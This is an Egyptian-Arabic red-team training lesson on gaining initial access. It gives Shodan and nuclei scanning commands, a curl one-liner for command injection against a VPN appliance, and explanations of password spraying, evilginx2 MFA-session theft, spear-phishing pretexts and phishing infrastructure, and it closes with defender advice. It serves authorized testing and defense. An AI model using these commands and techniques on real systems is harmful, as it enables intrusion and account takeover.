Cyber Operations Academy logo
أكاديمية العمليات السيبرانية
Red / Blue / Ops
الرئيسية/الدروس/L49
الفرق الحمراء — الهجومخبير90mL49

Initial Access — أول قدم جوّه الشبكة

Spear-phishing و خدمات مكشوفة و هجمات الهوية

#Phishing#Exposed#Spraying#ITW

الوصول الأولي: إزاي تكسر أول باب في الشبكة من غير ما حد يحس؟

طب إنت لما بتفكر في "اختراق"، بتتخيل ايه؟ هاكر بيكتب كود غامض على شاشة سودا؟ ولا exploit جاهز بيشتغل بضغطة زرار؟

لا يا معلّم. الواقع أبسط من كده بكتير، وأقذر من كده بكتير.

أول packet بيوصل لهدفك هو اللي بيفتح كل اللي جاي بعده. لو الـ packet ده فلت، خلاص — انت كده كده داخل، والباقي تفاصيل. تقارير M-Trends و Verizon DBIR كل سنة بتقول نفس الكلام: 90% من الاختراقات الجادة بتيجي من تلات سكك بس:

  • خدمة على الإنترنت ناسيين يعمّلوها patch.
  • حساب موظف باسورده مسرّب أو ضعيف.
  • إيميل تصيّد مكتوب صح.

ومع ذلك كل سنة الناس بتتفاجأ. ليه؟ معرفش الصراحة.

[!danger] قبل ما تكمّل الكلام ده كله authorized red-team بس. لو ما عندكش تصريح كتابي ونطاق واضح، يبقى انت مش red teamer — انت مجرم. والقانون مش بيفرّق.

1. الخدمات المكشوفة على النت — الباب الكبير اللي البواب نسي يقفله

أسهل طريق للدخول؟ تلاقي VPN أو firewall أو Citrix على الإنترنت ومش متعمّل له update من سنة. الجهاز ده قاعد على حافة الشبكة، يعني لما تكسره انت فعلياً جوّه. مش محتاج phishing ولا حركات.

زي ما البواب يقفل الباب الكبير ويسيب شباك الحمام مفتوح من ورا — الـ edge device ده هو شباك الحمام بتاعك.

الأدوات اللي بتشتغل فعلاً

# Shodan — بيقولك ايه الـ assets المكشوفة على الـ org ده
$ shodan search 'ssl:"target.gov" port:443'
$ shodan search 'org:"Target Org" product:"Ivanti Connect Secure"'
$ 
# nuclei — بيرمي عليك الـ CVEs المعروفة في ثواني، لو في حاجة هيلقطها
$ nuclei -u https://vpn.target.gov -t cves/2024/ -severity critical,high

مثال حي: استغلال RCE

ده مش سيناريو خيالي. حصل في 2024 مع Ivanti، وفي 2023 مع Citrix Bleed، وقبلهم Pulse Secure، وقبلهم Fortinet. السكة واحدة.

# الفكرة: Cookie فيها path traversal + command injection
# ليه بيشتغل؟ لأن الـ device بيـ trust الـ cookie ويعدّيها للـ shell
$ curl -k 'https://vpn.target.gov/ssl-vpn/hipreport.esp' \
$   -H "Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/css/\`id\`"
غلطات الـ junior
  • بيعمل scan كامل بـ nuclei من IP بتاعه شخصياً. الـ blue team هيشوفك في الـ logs قبل ما تشرب القهوة.
  • بيلاقي CVE وينفذ من غير ما يتأكد الـ device أصلاً vulnerable. بعض الـ exploits بتعمل crash للجهاز كله — وانت كده حرقت الـ engagement.

2. هجمات الهوية — الدخول من الباب وانت لابس بدلة

هنا ما عندكش ثغرة تقنية. عندك حساب موظف. وبتدخل بقوانين الشركة نفسها. الـ blue team بيشوفك "موظف بيشتغل". إنت داخل بـ legitimate creds. الكشف هنا صعب جداً — لأنك مش بتعمل حاجة غلط تقنياً.

  • Password Spraying: بدل ما تجرب 1000 password على حساب واحد وتقفله، جرّب password واحدة (Spring2026! أو CompanyName123) على 10000 حساب. lockout policies مش هتلاقطك لأن كل حساب اتجرب عليه مرة واحدة.
  • AitM (Adversary-in-the-Middle): evilginx2 بيقعد reverse proxy بين الضحية وبين login.microsoftonline.com الحقيقي. الضحية بتدخّل username + password + MFA code طبيعي جداً. كله بيوصل لك. والأهم: الـ session cookie بتاعتها بتتنسخ عندك. الكوكي دي = MFA-authenticated session. بقيت "هي" من غير ما تحتاج تعمل MFA تاني.

[!danger] الحقيقة المرّة الـ MFA الكلاسيكي (TOTP, SMS, push) بيقفل 99% من الـ phishing العادي. AitM بيكسره في 5 دقايق. الحماية الوحيد اللي بيشتغل فعلاً: FIDO2 / Passkeys. لأنها مربوطة بالدومين نفسه — evilginx على دومين تاني، فالمفتاح مش هيوقّع.

3. التصيّد الموجّه (Spear-Phishing) — السلاح الأول لأي APT

طب ليه التصيّد لسه شغّال في 2026؟ عندنا AI، عندنا EDR، عندنا training، عندنا email gateways بميار جنيه. ومع ذلك — لسه شغّال.

لأن الموضوع مش تقني. الموضوع نفسي.

النجاح في الـ spear-phishing بيعتمد على حاجة واحدة: الـ pretext لازم يكون منطقي للضحية في اللحظة دي بالذات. لو الموظف مستني فاتورة، ابعت فاتورة. لو شغّال على عقد مع جهة معينة، اتكلم باسم الجهة دي.

السيناريواللي بيدفع الضحية تفتحالمرفق
تحديث أمني عاجلالخوف من إنه يتلامHTML smuggling لـ payload
فاتورة متأخرةضغط الوقت + الإحراجWord بـ template injection
دعوة رسمية لمؤتمرالفضول المهني + الـ egoPDF بـ exploit في reader

4. التجهيز العملياتي — اللي الناس بتنساه فتترمي إيميلاتها في الـ spam

قبل ما تبعت إيميل واحد، لازم بنيتك التحتية تكون نضيفة:

  • Domain reputation: اشتري الـ domain من 30 يوم على الأقل. فعّل SPF + DKIM + DMARC. ابعت traffic عادي عليه أسبوع كامل قبل العملية. الإيميل اللي بيتبعت من domain عمره ساعتين بيتفلتر فوراً.
  • التوقيت: اختار وقت الموظف يكون مشتّت. صباح يوم الأحد بعد إجازة، آخر اليوم قبل الميعاد النهائي للتقرير، يوم الراتب. مش الساعة 3 الفجر.
  • الـ infrastructure: redirector + C2 منفصلين. لو الـ payload اتقبض عليه، الـ C2 الأساسي ما يحرقش.

الخلاصة الناشفة

للمهاجم: تلات سكك بس بتشتغل — edge service فيها CVE، حساب باسورده ضعيف، إيميل مكتوب صح. الباقي ضوضا.

للمدافع، لو هتعمل حاجة واحدة بس:

  1. FIDO2/Passkeys على كل حساب admin أو حساس. خلاص. مفيش نقاش.
  2. patch الـ edge devices في 72 ساعة من أي CVE critical. لو ما تقدرش، طلّعها من النت لحد ما تـ patch.
  3. monitor الـ identity layer: impossible travel، logins من ASNs غريبة، MFA fatigue. الـ identity هي الـ perimeter الجديد.

والباقي نظافة عامة.

السابق
Defense Evasion — EDR Bypass اللي محدش بيقولك
الوحدة التالية
Offensive OPSEC — تخش وتطلع من غير أثر